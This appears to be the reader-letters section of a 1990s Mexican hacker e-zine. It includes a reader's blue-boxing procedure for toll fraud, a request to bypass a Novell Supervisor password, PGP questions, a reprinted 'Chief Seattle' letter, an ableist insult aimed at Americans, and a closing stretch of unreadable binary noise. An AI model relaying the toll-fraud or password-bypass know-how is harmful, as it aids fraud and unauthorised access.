  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Que tal viejo, oye he leido articulos gavachos acerca del phreacking, y
>de hecho ya cuento con varios programas de blue boxing, pero no he
>podido hacer ninguna maldita llamada de larga distancia gratis !!!!
>Segun esto lo estoy haciendo bien ... checa si mi procedimiento esta
>bien :
>
>1. llamar a un numero 91-800...
>2. Cuando haya seqal de respuesta (tono de ocupado, tono de marcando, o
>grabacion)
>
>    hago lo siguiente :
>            (mando tono de 2600 hz)  +  KP  +  (91+LADA+Numero)   +  ST
>
>ej. de numero: 0164 180945 Estoy utilizando un set de marcado tipo
>CCITT 5, ta trate con un set DTMF y tampoco.
>
>? Que demonios estoy haciendo mal ????????

 No estoy seguro de que esa sea la manera para hacer llamadas gratis aqui en
 Mexico...

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>  Tengo una pequea pregunta , Como se puede interceptar mails? porque a
>mi una persona me los ha estado interceptando Y ME LOS ENVIA DE NUEVO
>PERO deformandoS !! YA TENGO SU E-MAIL !!!

Obviamente esta persona tiene tu password y te esta jugando una broma pesada.
por eso debes escoger passwords seguros y mantenerlo secreto.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>el administrador de una red novell 3.12 se retiro de un momento a otro y no
>dejo el password de Supervisor, quisiera saber si existe alguna manera de
>pasar dicha seguridad o en todo caso como averiguarlo. Gracias de antemano
>por su ayuda. Saludos.

Busca en nuestra pagina de software los programas para Novell...

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>1.-  Si yo tengo PGP 5.0 y alguien tiene una version anterior, el me
>puede mandar mensajes encriptados y que yo los pueda leer ?

 Asi es.

>2.-  PGP 5.0 puede encriptar archivos y mensajes usando DES ?

 No. DES ha desaparecido en la version 5.0 de PGP debido a problemas de
 licencia.

>3.-  Se puede extraer la llave secreta del PGP 5.0 ?

 Si. Abre el PGPKEYS y usa la opcion exportar que aparece cuando presionas
 el boton derecho del raton. Despues selecciona la opcion importar para
 aadir las llaves (publica y secreta).

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>  Y que paso con lo del posible hack a el server de IFE por parte
> de RdK , en las pasadas elecciones del jefe de gob. del D.F ?

 Las computadoras del IFE no estan conectadas a Internet como inicialmente
 pensaron. Resulto ser un simple servidor para paginas web solamente.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Banda, en el n. 7 pusieron un asertijo sobre un hombre que tenia que pasar
>un puente. Una situacion similar, le ocurre a Sancho Panza (escudero del
>quijote) en una de sus aventuras. Cervantes resuelve el problema apelando a
>la moral y la etica, habiendo dado Sancho un frase tan ingeniosa , y siendo
>que hagan lo que hagan, habran sido injustos, deciden perdonarle la vida y
>dejarle pasar. (Solucion de Cervantes, no mia)

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Condorito el personaje proveniente de pelotillehue, creado por Pepo.
>Sera la mascota oficial del windows 98 en America; si, microsoft compro
>los derechos de este personaje para incorporarlo en su nuevo sistema 
>operativo.

 El monopolio mas grande de USA invade America... y se sale con la suya.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>1- Publiquen de cuando en cuando programas completos (los fuentes por
>supuesto) de algunos jueguitos, aunque sean los mas mamilas que existan
>PacMan, Tetris y mamaditas de esas, a los que estudiamos nos gustan esas
>mamaditas.

 Algun programador interesado en compartir codigo fuente con los lectores?
 si pudiera aadir breves comentarios al codigo seria fenomenal!

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

                     CARTA DEL JEFE INDIO

 Como se puede comprar o vender el firmamento, ni aun el calor de la tierra?.
 Dicha idea nos es desconocida. Si no somos dueos de la frescura del aire ni
 del fulgor de las aguas Como podrian ustedes comprarlos? Cada parcela de
 esta tierra es sagrada para mi pueblo. Cada brillante mata
de pino, cada grano de arena de las playas, cada gota de rocio en
los oscuros bosques, cada altozano y hasta el sonido de cada insecto es
sagrado a la memoria y al pasado de mi pueblo. La savia que circula por
las venas de los  robles lleva consigo las memorias de los pieles rojas.
  Los muertos del hombre blanco olvidan su pais de origen cuando emprenden
sus paseos por las estrellas; en cambio, nuestros muertos nunca pueden
olvidar esa bondadosa tierra, puesto que es la madre de los pieles rojas.
  Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las flores
perfumadas son nuestras hermanas; el venado, el caballo, la gran guila;
estos son nuestros hermanos. Las escarpadas peas, los humedos prados, el
calor del cuerpo del caballo y el hombre, todos pertenecemos a la misma
familia.

  Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje
de que quiere comprar nuestras tierras dice que nos reservar un lugar en el
que podamos vivir confortablemente entre nosotros. El se convertir en nuestro
padre y nosotros en sus hijos. Por ello consideramos su oferta de comprar
nuestras tierras. Ello no es facil, ya que esta tierra es sagrada para
nosotros.
  El agua cristalina que corre por los rios y arroyuelos no es solamente
agua, sino, tambien, representa la sangre de nuestros antepasados. Si le
vendemos nuestra tierra deben recordar que es sagrada y a la vez deben
ensear a sus hijos que es sagrada y cada reflejo fantasmagorico en las
claras aguas de los lagos cuenta los sucesos y memorias de las vidas de
nuestras gentes.
  El murmullo del agua es la voz del padre de mi padre.
  Los rios son nuestros hermanos y sacian nuestra sed; son portadores de
nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras
tierras, ustedes deben recordar y ensearles a sus hijos que los rios son
nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos con
la misma dulzura con la que se trata a un hermano.
  Sabemos que el hombre blanco no comprende nuestro modo de vida.
  El no sabe distinguir entre un pedazo de tierra y otro, ya que es un
  extrao que llega de noche y toma de la tierra lo que necesita.
  La tierra no es su hermana, sino su enemiga, y una vez conquistada sigue
su camino, dejando atras la tumba de sus padres sin importarle. Le secuestra
la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus padres como
el patrimonio de sus hijos son olvidados. Trata a su madre, la tierra, y a su
hermano, el firmamento, como objetos que se compran, se explotan y se venden
como ovejas o piedras de colores. Su apetito devorar  la tierra, dejando atras
solo un desierto.
   No se, pero nuestro modo de vida es diferente al de ustedes. La sola
visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por
que el piel roja es un salvaje y no comprende nada.
   No existe un lugar tranquilo en las ciudades del hombre blanco, ni hay
sitio donde escuchar como se abren las hojas de los arboles en primavera o
como aletean los insectos. Pero quiza tambien esto debe ser porque soy
un salvaje que no comprende nada. El ruido solo parece insultar nuestros
oidos. Y despues de todo, para que sirve la vida si el hombre no puede
escuchar el grito solitario del chotacabras ni las discusiones nocturnas de
las ranas al borde de un estanque?. Soy un piel roja y nada entiendo.
  Nosotros preferimos el suave susurro del viento sobre la superficie de un
estanque, asi como el olor de ese mismo viento purificado por la lluvia del
mediodia o perfumado con aromas  de pinos. El aire tiene un valor inestimable
para el piel roja, ya que todos los seres comparten un mismo aliento, la
bestia, el arbol, el hombre, todos respiramos el mismo aire. El hombre blanco
no parece consciente del aire que respira; como un moribundo que agoniza
durante muchos dias es insensible al olor. Pero si les vendemos nuestras
tierras, deben recordar que el aire nos es inestimable, que el aire comparte
su espiritu con la vida que sostiene. El viento que dio a nuestros abuelos el
primer soplo de vida tambien recibe sus ultimos suspiros. Y si les vendemos
nuestras tierras, ustedes deben conservarlas como cosa aparte y sagrada, como
un lugar donde hasta el hombre blanco pueda saborear el viento perfumado por
las flores de las praderas.
   Por ello, consideramos su oferta de comprar nuestras tierras y si decidimos
aceptarla yo pondre una condicion: el hombre blanco debe tratar a los animales
de esta tierra como a sus hermanos. Soy un salvaje y no comprendo otro modo de
vida. He visto a miles de bufalos pudrirse en las praderas, muertos a tiros
por el hombre blanco desde un tren en marcha. Soy un salvaje y no comprendo
como una maquina humeante puede importar mas que el bufalo, al que nosotros
solo matamos para sobrevivir
   Que seria del hombre sin los animales? Si todos fueran exterminados, el
hombre moriria de una gran soledad espiritual; porque lo que suceda a los
animales tambien le sucedera al hombre, todo va enlazado. Deben ensearles a
sus hijos que el suelo que pisan son las cenizas de nuestros abuelos.Inculquen
a sus hijos que la tierra esta enriquecida con las vidas de nuestros
semejantes a fin que sepan respetarla. Enseen a sus hijos que nosotros hemos
enseado a los nuestros que la tierra es nuestra madre; y que todo lo que le
ocurra a la tierra le ocurrira a los hijos de la tierra. Si los hombres
escupen en el suelo, se escupen a si mismos. Esto sabemos: la tierra no
pertenece al hombre; el hombre pertenece a la tierra. Esto sabemos: todo va
enlazado, como la sangre que une una familia. Todo va enlazado.
   El hombre no tejio la trama de la vida; el solo es un hijo. Lo que hace con
la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo Dios pasea
y habla con el de amigo a amigo, queda exento del destino comun. Despues de
todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que quiza el hombre
blanco descubra algun dia: nuestro Dios es el mismo Dios. Ustedes pueden
pensar ahora que El les pertenece, lo mismo que desean que nuestras tierras
les pertenezcan, pero no es asi. El es el Dios de los hombres y su compasion
se comparte por igual entre el piel roja y el hombre blanco. Esta tierra tiene
un valor inestimable para El, y si se daa se provocaria la ira del Creador.
Tambien los blancos se extinguiran, quiza antes que las demas tribus.
Contaminan sus lechos y una noche pereceran ahogados en sus propios residuos.
Pero ustedes caminaran hacia su destruccion rodeados de gloria, inspirados por
la fuerza de Dios que os trajo a esta tierra y que, por algun designio
especial, les dio dominio sobre ella y sobre el piel roja. Ese destino es un
misterio para nosotros, pues no entendemos por que se exterminan los bufalos,
se doman los caballos salvajes, se saturan los rincones secretos de los
bosques con el aliento de tantos hombres y se atiborra el paisaje de las
exuberantes colinas con cables parlantes. Donde esta el matorral? Destruido.
Donde esta el aguila? Desaparecio.Termina la vida y empieza la supervivencia.

 "Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y
  debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas
  ortograficas" Colaboracion por Pata.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 Lamento lo que esta pasando en Geocities, pero ya sabeis
 que los hermanos del norte (el hermano Cain...si EEUU) no
 desean el progreso intelectual del resto del mundo, porque
 ellos son mongolicos y se creen los dueos del intelecto.
 Pero no desmayeis. El mundo H/C/P/V/A esta con vosotros.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^




  Rfhg{3z  e{H10GX d>esd+GW~1TrfN#Sicanl*$  MS
8 rg8z@DgF$T.|M - Eˊ3&@OM $zeW גBX
